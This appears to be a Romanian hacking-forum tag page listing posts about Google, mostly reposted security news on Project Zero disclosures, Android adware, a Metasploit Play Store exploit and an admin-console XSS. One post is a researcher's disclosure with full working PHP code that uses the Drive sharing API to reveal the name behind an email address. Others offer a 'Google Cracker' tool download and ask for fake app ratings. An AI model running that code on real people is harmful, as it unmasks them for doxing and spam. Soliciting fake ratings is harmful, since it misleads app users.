Jump to content

Search the Community

Showing results for tags 'google'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Highly aggressive adware has been found hidden in ten Android applications hosted on Google Play, Bitdefender reported. Adware is highly common on both desktop PCs and smartphones. However, the threats discovered by the security firm stand out not just because they are aggressive, but also because they employ clever tricks to stay hidden on the infected device. Once installed, the apps redirect victims to a webpage, hosted at mobilsitelerim.com/anasayfa, which serves ads designed to trick users into installing other pieces of adware disguised as system or performace updates, or get them to sign up for premium services. The displayed ads differ depending on the user’s location, Bitdefender said. “Although they’re not malicious per se, by broadcasting sensitive user information to third parties, they resemble aggressive adware found on desktop PCs. The resulting barrage of pop-ups, redirects and ads irks users and seriously damages both the user experience and the performance of Android devices,” Bitdefender security researcher Liviu Arsene explained in a blog post. After the adware (Android.Trojan.HiddenApp.E) is installed on the device, the redirections occur whenever the victim tries to access a website via the stock Android browser, Chrome, Firefox, and even Facebook. “After the apps are installed, the redirects occur as soon as you open any of the mentioned browsers. Regardless of what URL you’re trying to visit, you’re redirected to ad-displaying websites. The next redirect is performed after 60 seconds have elapsed,” Arsene told SecurityWeek via email. The applications had been uploaded to Google Play with names such as “What is my ip.” Researchers found the apps under two developer accounts, but the same individual might be behind both of them. In order to avoid raising suspicion, the applications only require two permissions on installation (Network Communication and System Tools). While users might figure out which of the apps they installed cause the annoying redirections, removing them could prove difficult. That’s because the applications are installed with the name “System Manager,” instead of the one used to advertise them on Google Play. The search giant appears to have removed most of the apps from Google Play after being alerted by Bitdefender, but some of the shady programs can still be found on third-party app markets. Experts believe the adware made it past Google’s vetting process because the URL that is used to redirect users doesn’t actually serve any malicious APKs. Source: securityweek.com
  2. Este facut pe platforma blogger, simplut, fara reclame, sper sa reusesc sa-l aduc pe prima pagina google apoi vor venii si clientii. Pareri? Sfaturi? Sell Cheap Facebook Likes and Votes
  3. Google on Thursday unleashed its own free web application vulnerability scanner tool, which the search engine giant calls Google Cloud Security Scanner, that will potentially scan developers' applications for common security vulnerabilities on its cloud platform more effectively. SCANNER ADDRESSES TWO MAJOR WEB VULNERABILITIES Google launched the Google Cloud Security Scanner in beta. The New web application vulnerability scanner allows App Engine developers to regularly scan their applications for two common web application vulnerabilities: Cross-Site Scripting (XSS) Mixed Content Scripts Despite several free web application vulnerability scanner and vulnerability assessment tools are available in the market, Google says these website vulnerability scanners are typically hard to set up and "built for security professionals," not for web application developers that run the apps on the Google App Engine. While Google Cloud Security Scanner will be easier for web application developers to use. This web application vulnerability scanner easily scans for Cross-Site Scripting (XSS) and mixed content scripts flaws, which the company argues are the most common security vulnerabilities Google App Engine developers face. Today, common HTML5 and JavaScript-heavy applications are more challenging to crawl and test, and Google Cloud Security Scanner claims to take a novel approach by parsing the code and then executing a full-page render to find more complex areas of a developer's site. GO FOR WEB VULNERABILITY SCAN NOW The developers can access the Cloud Security Scanner under Compute > App Engine > Security in Google's Developers Console. This will run your first scan. It does not work with App Engine Managed VMs, Google Compute Engine, or other resources. Google notes that there are two typical approaches to such security scans: Parse the HTML and emulate a browser – This is fast; however, it comes at the cost of missing site actions that require a full DOM or complex JavaScript operations. Use a real browser – This approach avoids the parser coverage gap and most closely simulates the site experience. However, it can be slow due to event firing, dynamic execution, and time needed for the DOM to settle. Security Engineering head Rob Mann says that their web vulnerability scanner uses Google Compute Engine to dynamically create a botnet of hundreds of virtual Chrome workers that scan at a max rate of 20 requests per second, so that the target sites won’t be overloaded. The search engine giant still recommended developers to look into manual security review by a web app security professional, just to be on the safer side. However, the company hopes its vulnerability scanner tool will definitely provide a simple solution to the most common App Engine issues with minimal false positives. Source
  4. Google has adjusted the terms of its controversial Project Zero vulnerability scouting effort, loosening its 90-day disclosure policy somewhat to give companies a better chance of fixing their security bugs before they become public knowledge. Among the changes, Google says it will no longer disclose bugs on weekends and public holidays, and it will even offer software vendors a brief grace period to finish their patches, if they request one. Project Zero has drawn fire from software companies – most notably Microsoft – for disclosing critical vulnerabilities to the public exactly 90 days after it reports them to vendors, a policy that top Redmond security bod Chris Betz said "feels less like principles and more like a 'gotcha'." "What's right for Google is not always right for customers," Betz wrote in a blog post in January. "We urge Google to make protection of customers our collective primary goal." Mind you, it's only natural that Microsoft would be miffed. Among the bugs revealed by Project Zero so far are critical zero-day flaws in Windows that can potentially allow an attacker to gain full control of affected systems. Google's vulnerability disclosures often include proof-of-concept exploit code, meaning cyber-crooks have access to working exploits the minute Google's disclosure goes live. Still, Google seems to have heard Redmond's complaints. On Friday, the online ad-slinger said it would make changes to how Project Zero discloses flaws, but it stopped short of saying it would lengthen the 90-day deadline, noting that CERT's own deadline is even shorter. "We notify vendors of vulnerabilities immediately, with details shared in public with the defensive community after 90 days, or sooner if the vendor releases a fix," Google's security team wrote in a blog post. "We've chosen a middle-of-the-road deadline timeline and feel it's reasonably calibrated for the current state of the industry." Going forward, however, 90 days won't necessarily mean 90 days. For one thing, if the date of a patch disclosure deadline falls on a weekend or a public holiday, Google now says it will hold off on its disclosure until the next working day. What's more, the Chocolate Factory says it will extend the disclosure deadline by a grace period of up to 14 days, provided a vendor lets it know that a patch will be released on a specific date within the 14 days. "Public disclosure of an unpatched issue now only occurs if a deadline will be significantly missed," Google's post states. Google says it will also be sure to pre-assign CVE (Common Vulnerabilities and Exposure) numbers to bugs that go past their deadlines before it discloses them, to avoid confusion and help the public understand specific threats. But Redmond wasn't entirely satisfied with the changes, saying it would much rather see Google work more interactively with software vendors to apply patches. "When finders release proof-of-concept exploit code, or other information publically before a solution is in place, the risk of attacks against customers goes up," Microsoft's Betz told The Register in an emailed statement. "While it is positive to see aspects of disclosure practices adjust, we disagree with arbitrary deadlines because each security issue is unique and end-to-end update development and testing time varies." Google, meanwhile, said that an arbitrary deadline, albeit a nondiscriminatory one, is the best vendors can hope for. "As always, we reserve the right to bring deadlines forwards or backwards based on extreme circumstances," Google's security team said. "We remain committed to treating all vendors strictly equally." ® Sursa
  5. Red Hat Enterprise Linux customers can now shift their licenses from on-premise gear up into Google's cloud as well as Amazon's. The new licensing option was announced by Google and Red Hat on Monday alongside the general availability of Red Hat Enterprise Linux on Google's Amazon-killing "Cloud Platform". RHEL had been available in a "preview" mode since Compute Engine went into general availability in December 2013. With the news, RHEL will be available to customers in both an on-demand consumption model and via a "Red Hat Cloud Access" option which lets companies "migrate their current [RHEL] subscriptions for use on Google Cloud Platform." To give punters this option, Google has joined the "Red Hat Certified Cloud Provider Program", which means the company has met the "testing and certification requirements to demonstrate that they can deliver a safe, scalable, supported and consistent environment for enterprise cloud deployments," Red Hat wrote in a release. The RHEL software served up on Google's cloud platform differs from typical installations, Google explains, by incorporating Google's Compute Engine tools gcutil, gsutil, and gcimagebundle, enabling SELinux by default, allowing inbound SSH access through the RHEL firewall, augmenting rsyslog, and other tweaks. RHEL cloud servers cost extra. Google charges $0.06 per hour for the RHEL software on servers of less than eight virtual cores and $0.13 per hour on servers with more, along with the base server fee. Until today it was only possible for punters to shift their on-premise licenses up into cloud king Amazon Web Services. The new choice of suppliers is likely to be welcomed, especially since Amazon and Google are locked in a price war with each other. ® Source
  6. Google’s unwavering vulnerability disclosure deadlines are the latest chapter in a decades-long debate about how to best inform affected users that there’s a security problem with their software. Since the start of the year, Google’s 90-day clock has most notably ticked down to zero on a trio of flaws in Microsoft products and two others in Apple’s OS X. And upon doing so, Google’s researchers shared with the world technical details and proof of concept code for each vulnerability. Proponents of Google’s policy will argue that 90 days is plenty of time for a vendor to address a “responsibly” disclosed vulnerability. Opponents argue that a zero day is a zero day, and in such cases, a greater cut of attackers has vital information for exploit building when the details are public. Google, being the giant that it is, threw more gasoline on the controversial fire when, with one of the Microsoft flaws, it refused to sit on the details reportedly for two more days until Microsoft said it would be ready with a patch. Today, Google announced several adjustments to its disclosure policy, one of them being a 14-day grace period afforded to vendors that inform Google before the expiration of the 90-day deadline that a patch is scheduled for release within the 14-day extension. “Public disclosure of an unpatched issue now only occurs if a deadline will be significantly missed (2 weeks+),” the Project Zero team said in its announcement. “As always, we reserve the right to bring deadlines forwards or backwards based on extreme circumstances. We remain committed to treating all vendors strictly equally,” the researchers wrote. “Google expects to be held to the same standard; in fact, Project Zero has bugs in the pipeline for Google products (Chrome and Android) and these are subject to the same deadline policy.” Google also announced that the first public mention of a vulnerability needs to include a CVE identifier and that Google will obtain a pre-assigned one for vulnerabilities that go past deadline. It also said that if a 90-day deadline expires on a weekend or a U.S. public holiday, the deadline will be extended to the next working day. “Putting everything together, we believe the policy updates are still strongly in line with our desire to improve industry response times to security bugs, but will result in softer landings for bugs marginally over deadline,” Google said. “Finally, we’d like to call on all researchers to adopt disclosure deadlines in some form, and feel free to use our policy verbatim if you find our data and reasoning compelling.” This should make some major vendors breathe a little easier. Microsoft, for its part, said that it disagrees with arbitrary deadlines because of the uniqueness of vulnerabilities and variables introduced during patch development and testing time. “We prioritize security updates based on the probability and impact to customers,” said Chris Betz, head of the Microsoft Security Response Center. “When finders publically disclose vulnerability information with exploit details, they are increasing the potential for attack for millions of customers.” Google isn’t the only major technology company with a disclosure deadline. HP’s Zero Day Initiative, one of the first vulnerability programs, has a 120-day deadline, while CERT at the Software Engineering Institute at Carnegie Mellon University, a DHS-sponsored organization, has a 45-day deadline. Deadlines ensure that vendors don’t sit on vulnerabilities for months, or years in some cases. “The idea of disclosure deadlines is an old one and in practice in a lot of organizations,” said Katie Moussouris, chief policy officer at HackerOne. “The idea behind it is that people are protected and risk is minimized by limiting the window of exposure caused by an unpatched vulnerability.” Google, meanwhile, made its case that its disclosure policies are working, with vulnerabilities patched consistently and quicker by most of the affected vendors. It says, for example, that Adobe has patched 37 vulnerabilities reported by Google inside of the 90-day deadline; 154 Project Zero vulnerabilities overall (85 percent) were fixed inside of 90 days. Sursa
  7. Using a combination of vulnerabilities in the Google Play store and the Android stock browser, attackers can install malicious apps remotely on some Android devices. The attack is the result of a failure on the part of Google’s Play Store Web application to completely enforce the X-Frame-Options header, a common defense against clickjacking and other attacks. Researchers at Rapid7 discovered that combining that weakness with an XSS flaw in another area of the Play Store, or a universal XSS in some Android browsers can allow an attacker to install and launch apps. Developers at the Metasploit Project have added a module to the Metasploit Framework that can exploit these vulnerabilities on some Android devices. This module combines two vulnerabilities to achieve remote code execution on affected Android devices. First, the module exploits CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in versions of Android’s open source stock browser (the AOSP Browser) prior to 4.4. Second, the Google Play store’s web interface fails to enforce a X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be targeted for script injection,” the documentation from Metasploit says. “As a result, this leads to remote code execution through Google Play’s remote installation feature, as any application available on the Google Play store can be installed and launched on the user’s device.” Tod Beardsley of Rapid7 said in a blog post about the attack that users on vulnerable platforms who are always logged in to common Google services are especially at risk. “Of the vulnerable population, it is expected that many users are habitually signed into Google services, such as Gmail or YouTube. These mobile platforms are the the ones most at risk. Other browsers may also be affected,” he said. The module to exploit this attack is in Metasploit now, a circumstance that often is a precursor to a wave of attacks on a targeted vulnerability. Source
  8. We all know about Google Drive, the cloud storage and file backup service offered by Google. Everyone can get free 15 GB cloud storage on Google Drive at any time: just signup for a Google account (or login to your existing Google account), head over to the Google Drive page, and boom — you have your free 15 GB that never expires. For a limited time, however, you can get an additional (extra) 2 GB for your Google Drive account for life. Yes, that means you will have 17 GB on Google Drive that won’t ever expire. Get it now. Sale ends in 2 days 18 hrs 36 mins Link: Free lifetime 17 GB Google Drive cloud storage (100% discount)
  9. Google is offering grants worth up to $3,000 to investigate suspected security flaws as a part of a new "experimental" initiative. Google security engineer Eduardo Vela Nava announced the move in a blog post, promising to offer further incentives for researchers to investigate suspected problems that they would otherwise ignore. "Today we're rolling out a new, experimental programme: Vulnerability Research Grants. These are upfront awards that we will provide to researchers before they ever submit a bug," he explained. "We'll publish different types of vulnerabilities, products and services for which we want to support research beyond our normal vulnerability rewards. "We'll award grants immediately before research begins, with no strings attached. Researchers then pursue the research they applied for, as usual. There will be various tiers of grants, with a maximum of $3,133.70." Google also announced plans to expand its existing bug bounty programme to include flaws in mobile applications. "Also starting today, all mobile applications officially developed by Google on Google Play and iTunes will now be within the scope of the Vulnerability Reward Programme," read the post. Google has been a constant supporter of bug bounty schemes, and announced reforms to its programmes in 2014. Google tripled Chrome bug bounty payments to $15,000 in October prior to launching the Project Zero initiative. Project Zero was launched in July 2014 with the apparent intention of speeding up companies' patch release schedules. The team of researchers does this by initially disclosing flaws privately to the firms responsible and giving them 90 days to release a fix before making the research public. The project was criticised earlier this year for the public disclosure of bugs in Microsoft's Windows and Apple's Mac OS X operating systems. Nava credited the schemes as a success despite the controversy. He revealed that Google paid researchers more than $1.5m for discovering over 500 bugs last year. Source
  10. Vreau sa stiu daca articolele scrise cu acest gen de programe de pe internet urca in google sau tot manualul e bun?
  11. Guest

    Domeniu .com

    Domeniu .com Pe google .com & .ro apare pe prima pagina, iar pe google.es apare la a doua pagina.
  12. Google nu ma accepta nicicum pe Adsense. Incerc sa pun adsense pe contul de youtube...ma ajuta cineva?
  13. Update: OK Apple, your turn. After raising a ruckus with the disclosure of three unpatched Windows vulnerabilities, Google’s Project Zero research team did the same this week with a trio of security issues in Apple OS X. Project Zero imposes a 90-day deadline on vulnerabilities it reports to affected vendors; if a patch is not delivered inside that time frame, details are automatically made public via its external database. The respective OS X bugs were reported to Apple in late October and 90-day deadlines began expiring this week. The Project Zero disclosures also come with proof-of-concept exploit code. A request for comment from Apple was not returned in time for publication. Published reports indicate that the vulnerabilities have been patched in Yosemite 10.10.2, which is in beta. The vulnerabilities affect different components of Apple’s flagship operating system, and range from memory corruption, kernel code execution and a sandbox escape. All three require some kind of local access to exploit. The sandbox escape vulnerability, OS X networkd “effective_audit_token” XPC type confusion sandbox escape as labeled by Google, may have been mitigated starting in the Yosemite version of OS X. Google refers to a separate advisory for those details. In its disclosure on Tuesday, Google said that the networkd system daemon implements an XPC service API which communicates on behalf of an application. Project Zero said that XPC messages using get parameters are used without checking the type of returned value. This allows messages to reach functions outside the sandbox, Google said. One day later, the 90-day deadline expired on an OS X IOKit kernel execution vulnerability. “Calling IOConnectMapMemory on userclient type 2 of “IntelAccelerator” with memory type 3 hits an exploitable kernel NULL pointer dereference calling a virtual function on an object at 0x0,” Google said in its advisory. Part of this disclosure originally included a kernel ASLR bypassed, but that was patched in Yosemite 10.10, Google said. The third disclosure happened yesterday and is another OS X IOKit kernel memory corruption vulnerability. Google said a Bluetooth device must be connected to exploit this bug, which is due to a bad bzero in IOBluetoothDevice. “Userspace can modify the size in shared memory leading to the bzero writing a controlled number of NULL bytes off the end of the buffer,” the advisory said. Project Zero’s automated disclosures are the latest salvo in the industry’s eternal debate over the sharing and distribution of vulnerability details. Microsoft fought back after Google spilled the beans on a trio of its unpatched bugs, one of which Google refused to sit on for an additional two days before Microsoft was to release a patch. Source
  14. Google Cracker V1 By No Network Organization Based On Facebook Cracker V2 By Mauritania Attacker Scan Link: FuckingScan Download: https://drive.google.com/file/d/0By7jLp_VXjqHaUItUVBUOXNnOGs/view
  15. Buna ziua mare hascar shelo nu mai are dume sau sa blocat google la fraeri ca el se face singur de ras pe messenger Macar invatatil sa nu mai caute dume pe google si sa le caute pe redtube
  16. Buna seara, Tocmai am publicat un joc in Google Play. Am nevoie de suportul vostru, mai exact sa-mi lasati un rating pozitiv, eventual si un comentariu pe pagina de Google Play. Cei care sunt binevoitori si doresc sa ma ajute cu acest lucru sunt rugati sa-mi trimita PM. Profit de aceasta ocazie si anunt ca am nevoie de un developer Android cu ceva experienta sa dezvoltam aplicatia mai departe. In urmatoarea versiune doresc sa adaug si modul Multiplayer si cateva features mai putin complicate, cum ar fi double bet. Mentionez ca sunt dispus sa impart eventualul castig cu developer-ul. De design si de promovarea aplicatiei ma ocup eu. PM daca este cineva interesat!
  17. A critical cross-site scripting (XSS) vulnerability in the Google Apps administrator console allowed cyber criminals to force a Google Apps admins to execute just about any request on the https://admin.google.com/ domain. The Google Apps admin console allows administrators to manage their organization’s account. Administrators can use the console to add new users, configure permissions, manage security settings and enable Google services for your domain. The feature is primarily used by many businesses, especially those using Gmail as the e-mail service for their domain. The XSS flaw allowed attackers to force the admin to do the following actions: Creating new users with "super admin" rights Disabling two-factor authentication (2FA) and other security measures from existing accounts or from multiple domains Modifying domain settings so that all incoming e-mails are redirected to addresses controlled by the attacker Hijack an account/email by resetting the password, disabling 2FA, and also removing login challenges temporarily for 10 minutes This new zero-day vulnerability was discovered and privately reported by application security engineer Brett Buerhaus to Google on September 1 and the company fixed the flaw within 17 days. In exchange for the report, Google paid the researcher $5,000 as a reward under its bug bounty program. According to the researcher, when users access a service that hasn’t been configured for their domain, they are presented with a "ServiceNotAllowed" page. This page allows users to switch between accounts in order to log in to the service. However, when one of the accounts was selected, a piece of JavaScript code was executed in an attempt to redirect the user’s Web browser. JavaScript code could be supplied by the user in the "continue" request parameter of the URL, which allowed XSS attacks. Patching the vulnerability on the 17th day after reported to the company shows the search engine giant’s concern to secure its software and users as well. However, the recent vulnerability troubles visited Microsoft exposed one-after-one three serious zero-day vulnerabilities in Windows 7 and 8.1 operating systems, reported by Google’s Project Zero team. Microsoft wasn't able to fix the security flaws in its software even after a three-month-long time period provided to the company. Source
  18. overview on 12/09/14 i discovered a method of revealing the full and/or display names associated with gmail accounts via maps engine, whether or not those accounts are associated with google plus, which renders said information public. i immediately submitted my findings to google’s vulnerability rewards program and began correspondence with their security team. at some point during this time, i discovered a nearly identical vulnerability in google drive, and held it as an ace up my sleeve while awaiting feedback on the maps engine leak. the google drive leak differs in a few ways from the maps engine leak, specifically in that it doesn’t deploy an email to the target – potentially informing him or her that something is afoot, and is what the live proof of concept and open source code are based upon. here it is in action with a non-g+ account: <11:35 pm est update> it has recently come to light that this not only works on google accounts, but *some* hotmails, yahoos and others as well. here’s a small excerpt of what i just sent over to google’s security team: additionally, adrian suggested the possibility of: so thanks to him and marcus from the 2600 group for helping me try to wrap my head around this, and this tweet, which poses an excellent question: as well as for providing some suggested reading material for the guys on google’s security team: </11:35 pm est update> timeline of events 12/09/14: submitted vulnerability report 12/15/14: confirmation that the issue exists 12/16/14: google employee confirms that maps engine is “too chatty” and files a bug report 01/17/15: i am informed the issue “doesn’t represent a security vulnerability” 01/20/15: google publicly announces its plans to deactivate maps engine and restricts new signups 01/20/15: it is discovered that other email services, not just gmail, are vulnerable. google security team notified via email click here for a live poc demo of the gmail full name revealer now obviously you aren’t going to reveal a target’s full name every time. there are a few factors to consider; one of which being that not everyone uses their actual full name when signing up for something on the internet, another being that gmail account’s must be 6 characters long, and i’m sure a few others i’m not accounting for. sometimes you’ll retrieve null results, but most of the time what you’ll end up with is either a user-set display name, or in most cases, the first and last name the target entered while signing up for the account as seen here: and here‘s the source code. you may quickly notice php isn’t my native programming language, so feel free to make revisions. i’d love to see them. <?php $targetEmail = 'target@gmail.com'; require_once "google-api-php-client/src/Google/Client.php"; require_once "google-api-php-client/src/Google/Service/Drive.php"; require_once "google-api-php-client/src/Google/Auth/AssertionCredentials.php"; $cScope = 'https://www.googleapis.com/auth/drive'; $cClientID = '[clientid]'; $cClientSecret = '[clientsecret]'; $cRedirectURI = '[redirecturi]'; $cAuthCode = ''; if(isset( $_GET['code'])) { $cAuthCode = $_GET['code']; } if (!($cAuthCode) == "null") { $rsParams = array( 'scope' => $cScope, 'state' => 'security_token', 'redirect_uri' => $cRedirectURI, 'response_type' => 'code', 'client_id' => $cClientID, 'access_type' => 'offline', 'approval_prompt' => 'force' ); $cOauthURL = 'https://accounts.google.com/o/oauth2/auth?' . http_build_query($rsParams); header('Location: ' . $cOauthURL); exit(); } elseif (empty($cRefreshToken)) { $authURL = "https://www.googleapis.com/oauth2/v3/token?code=" . $cAuthCode . "&client_id=" . $cClientID . "&client_secret=" . $cClientSecret . "&redirect_uri=" . $cRedirectURI . "&grant_type=authorization_code"; $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_URL, $authURL); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, ""); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); $oToken = json_decode($output); $accessToken = $oToken->access_token; $refreshToken = $oToken->refresh_token; } $createURL = "https://www.googleapis.com/drive/v2/files"; $ch = curl_init(); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'Content-Type: application/json', "Authorization: Bearer " . $accessToken )); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST'); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_URL, $createURL); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "{\"title\": \"revealyourself1\"}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); $oToken = json_decode($output); $fileID = $oToken->id; $compileJSON = array("role" => "writer","type" => "user","value" => $targetEmail,"emailAddress" => $targetEmail); $jsonPostData = json_encode($compileJSON); $addUser = "https://www.googleapis.com/drive/v2/files/" . $fileID . "/permissions?sendNotificationEmails=false"; $ch = curl_init(); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'Content-Type: application/json', "Authorization: Bearer " . $accessToken )); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST'); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_URL, $addUser); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonPostData); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); if (strpos($output,'error') !== false) { echo 'error feedback from google:<br><br>' . $output; } else { $oToken = json_decode($output); $fullName = $oToken->name; echo $targetEmail . ' is ' . $fullName; } ?> reflection this clearly isn’t, by any stretch of the imagination, the hack of the century. however, i do think that the significance of this issue, as well as my efforts to correct it, were marginalized by google. i believe many users signing up for a simple webmail account aren’t comfortable with their full names being readily accessible to the public, and ultimately my goal here is to see google make a more concentrated effort to protect their user’s privacy. i would like to see these two security vulnerabilities patched before troublemakers start running wild d0xing each other and spammers utilize them to compile name,email .csv data for highly targeted unsolicited email campaigns. i also think that these are two instances of information leaks, which google’s vulnerability rewards program classifies as being valued at $5,000 to $10,000 a pop, and i classify as information leaks based on google’s privacy policy’s indication of their user’s names being “personal information.” in any case, i won’t be working with google’s security team in the future unless they, at least in this particular instance, reevaluate what constitutes a security vulnerability. stay tuned for updates. Source: http://mcsheehan.com/?p=15
  19. I've found this video, and is very useful for all of us who doesn't know about startpage secure engine, the best alternative to google:
  20. Microsoft has heavily criticized Google and its 90-days security disclosure policy after the firm publicly revealed two zero-day vulnerabilities in Microsoft’s Windows 8.1 operating system one after one just days before Microsoft planned to issue a patch to kill the bugs. But, seemingly Google don't give a damn thought. Once again, Google has publicly disclosed a new serious vulnerability in Windows 7 and Windows 8.1 before Microsoft has been able to produce a patch, leaving users of both the operating systems exposed to hackers until next month, when the company plans to deliver a fix. DISCLOSURE OF UNPATCHED BUGS, GOOD OR BAD? Google’s tight 90-days disclosure policy seems to be a good move for all software vendors to patch their products before they get exploited by the hackers and cybercriminals. But at the same time, disclosing all critical bugs along with its technical details in the widely used operating system like Windows 7 and 8 doesn’t appears to be a right decision either. In both cases, the only one to suffer is the innocent users. The revelation of the security flaw was also a part Google's Project Zero, an initiative that identifies security holes in different software and calls on companies to publicly disclose and patch bugs within 90 days of discovering them. This time the search engine giant has discovered a flaw in the CryptProtectMemory memory-encrypting function found within Windows 7 and 8.1 and presents in both 32- and 64-bit architectures, which can accidentally disclose sensitive information or allow a miscreant to bypass security checks, apparently. MICROSOFT WILL DELIVER PATCH IN FEB, 2015 Google first notified Microsoft of the vulnerability in Windows 7 and 8.1 on October 17, 2014. Microsoft then confirmed the security issues on October 29 and said that its developers managed to reproduce the security hole. The patch for the vulnerability is scheduled for Feb. 10, next Patch Tuesday. The vulnerability was found by James Forshaw, who also discovered a "privilege elevation flaw" in Windows 8.1, which was disclosed earlier this week and drew strong criticism from Microsoft. The newly discovered bug actually resides in the CNG.sys implementation, which failed to run proper token checks. This is third time in less than a month when the Google’s Project Zero released details of the vulnerability in Microsoft’s operating system, following its 90-day public disclosure deadline policy. Few days ago, Google released details of a new privilege escalation bug in Microsoft's Windows 8.1 operating system just two days before Microsoft planned to patch the bug. Google vs. Microsoft — Google reveals Third unpatched Zero-Day Vulnerability in Windows - Hacker News
  21. Am zis sa bag stirea aici ca nu prea e de securitate.... By EJ Dickson on September 15, 2014 This article contains sexually explicit material that may be NSFW. Everyone has a favorite search engine for finding porn. But it’s a well-established fact that thanks to certain tech juggernauts imposing restrictions on adult content in search results, some search engines are just better at finding smut than others (*cough Bing cough*). If you have an ultra-high-powered government job, or you share a computer with a roommate who’s studying for the clergy, there’s always a concern that your late-night searches for busty Brazilian teens will show up in your search history. But apparently, you won’t have to worry about that happening with Boodigo, which is being touted as “the world’s first adult search engine.” Unlike other search engines, which make it intentionally difficult for users to access naughtier content, Boodigo “is designed to find ‘real’ adult sites and give top listings to them,” Colin Rowntree, one of Boodigo’s founders, said in a press release. “That avoids the problem of going to Google, searching for, say, ‘blowjob’, and getting the first multiple results pages of Wikipedia articles, women’s magazine how-to guides, etc., before the online user can actually find a link to sites that focus on blowjob photos and movies.” Boodigo isn’t actually the first search engine designed exclusively for porn: There’s also Search.xxx, an adult-friendly mockup of Google, as well as PornMD. But unlike PornMD, which will take you directly to free tube sites (which many performers in the adult industry have claimed encourages the spread of illegal piracy), Boodigo is marketing itself as a search engine for the ethical porn aficionado: The site directs you to individual performer and studio pay sites, instead of sites that might feature illegally posted or unlicensed content. Curious about the potential of a porn search engine that encourages people to actually pay for porn, I decided to give Boodigo a whirl. I started with an easy one: adult performer and Duke porn star Belle Knox, whom I met at her birthday party earlier this year. Here’s what came up when I searched for Knox on Google, sans SafeSearch settings: And here’s Knox on Boodigo: These search results either link to Belle’s entries on various porn databases, or to pay sites that feature her work, where you have to again search for her there. (Not all of them even do: Baremaidens.com, for instance, which shows up in a Boodigo search, features performers named “Bailey Knox” and “Natasha Belle,” but not the Duke porn star herself.) Next, I tried “eel anal porn,” based on an unnamed coworker’s suggestion that a film called Eels Out the Ass Like Whoa is a real thing. When I searched on Google, the clip immediately came up in the second search result, for better or for worse: Sadly, that was not the case on Boodigo. Apparently, the site had some trouble differentiating between the specific niche I was searching for (i.e. eel anal porn), and good old-fashioned anal porn, which in the world of porn searches is kind of like being unable to tell the difference between a Burgundy and a Bordeaux and just saying, "meh, they're both red wines." Boodigo also pulled up a performer named “Anal Alan,” whom I had never heard of but apparently has an empty YouTube channel. (Given that his height is listed as “0,” I guess it’s no surprise that his career never took off.) Because “eel anal porn” is admittedly fairly obscure, I decided to search for just “anal.” My luck was a little better with Boodigo this time around: Not so much with Google, however, which pulled up Wikipedia and the r/anal subreddit in lieu of actual anal porn: That's like asking for a glass of Bordeaux and getting a warm can of 7-Up instead. Shame on you, Google. Shame. On. You. So, OK, if it wants to go around calling itself the world’s first porn search engine, Boodigo obviously needs to work out a few kinks first. But in light of Google’s recent AdWords policy change restricting adult content advertising, many porn performers and producers have expressed concern that tech giants are increasingly censoring adult content, which might lead to them eliminating adult content from their platforms altogether. If that actually ever happens, a search engine like Boodigo won’t just be helpful to porn aficionados looking for a secure, anonymous, cookie-free J.O. experience—it’ll be necessary. Let’s just hope for the sake of eel anal enthusiasts that it tweaks its algorithms a bit first. Photo via morgueFile Archive (PD) Source: Can the 'world's first porn search engine' beat Google?
  22. PARIS - France's data protection watchdog on Wednesday fined Google 150,000 euros ($205,000) -- the maximum possible -- for failing to comply with its privacy guidelines for personal data. The watchdog, the CNIL, also ordered the US Internet giant to publish a statement relating to its decision on its French homepage for at least 48 hours within the next eight days. Google was informed of the decision on January 3, the CNIL said in a statement. France's move follows Google's introduction in 2012 of a new privacy policy which enables it to track user activity across its search engine, Gmail, the Google+ social networking platform and other services it owns, which include YouTube. The changes make it easier for Google to collect and process data that could be used by advertisers to target individuals with tailored offers, thereby increasing the company's revenue potential. The CNIL had asked Google to inform web users in France on how it processes their personal data and to define exactly how long they can store the information. It had also requested that the US giant obtain user permission before storing cookies on their computers, referring to files that track web surfers and allow companies to target them with tailored commercials. Google has always maintained that its treatment of data gathered from users is in line with European law and has previously refused to get into an argument about the specific French requirements. The issue of data protection has gathered steam worldwide following revelations by Edward Snowden, a former contractor with the National Security Agency, that the US had a vast, secret program called PRISM to monitor Internet users. Google has defended the changes it made last year on the ground 